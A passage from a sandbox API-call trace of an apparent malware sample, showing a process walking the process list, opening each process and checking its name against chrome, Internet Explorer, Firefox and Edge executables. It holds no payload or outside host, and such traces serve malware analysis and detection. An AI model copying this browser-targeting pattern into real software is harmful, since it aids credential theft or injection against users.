	[0254.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.961] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.961] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.961] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.962] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0254.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xadb4
	[0254.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.963] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0254.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.963] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.964] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0254.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.964] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.964] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xadb8
	[0254.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.965] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.965] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.966] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.966] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.967] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0254.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xadbc
	[0254.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.969] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.969] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.970] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.970] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.970] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0254.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xadc0
	[0254.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.971] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0254.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.971] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.972] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0254.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.972] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.972] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xadc4
	[0254.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.973] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.974] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.974] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.974] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.974] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0254.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xadc8
	[0254.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.975] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0254.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.976] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.976] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0254.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.976] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.977] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0254.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xadcc
	[0254.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.978] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0254.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.978] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.978] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0254.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.979] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.979] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0254.979] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xadd0
	[0254.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.980] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0254.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.980] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.980] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0254.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.980] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.981] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0254.981] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xadd4
	[0254.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.982] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0254.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.982] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.982] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0254.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.986] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.986] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0254.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0254.987] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0254.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xadd8
	[0254.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.988] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0254.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.988] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.989] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0254.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.989] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.990] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0254.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xaddc
	[0254.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.991] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0254.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.991] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.991] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0254.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.992] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.992] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0254.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xade0
	[0254.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.993] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0254.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.993] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.994] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0254.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.994] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.994] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0254.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xade4
	[0254.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.995] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0254.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.996] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.996] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0254.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.996] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.997] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0254.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xade8
	[0254.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.998] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0254.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.998] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.999] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0254.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.999] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.000] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0255.001] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xadec
	[0255.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.001] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0255.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.001] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.001] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0255.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.002] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.002] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0255.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xadf0
	[0255.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.003] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0255.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.003] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.004] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0255.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.004] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.005] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0255.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xadf4
	[0255.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.006] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0255.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.006] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.007] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0255.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.007] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.007] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0255.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xadf8
	[0255.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.008] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0255.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.009] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.009] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0255.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.009] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.009] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0255.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xadfc
	[0255.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.010] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0255.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.011] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.011] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0255.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.011] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.011] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0255.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xae00
	[0255.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.012] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0255.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.013] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.013] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0255.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.014] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0255.015] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xae04
	[0255.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.016] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0255.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.016] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.017] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0255.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.017] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0255.019] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xae08
	[0255.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.019] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0255.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.019] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.020] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0255.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.020] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.021] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0255.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xae0c
	[0255.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.022] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0255.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.022] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.023] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0255.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.024] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0255.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xae10
	[0255.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.025] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0255.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
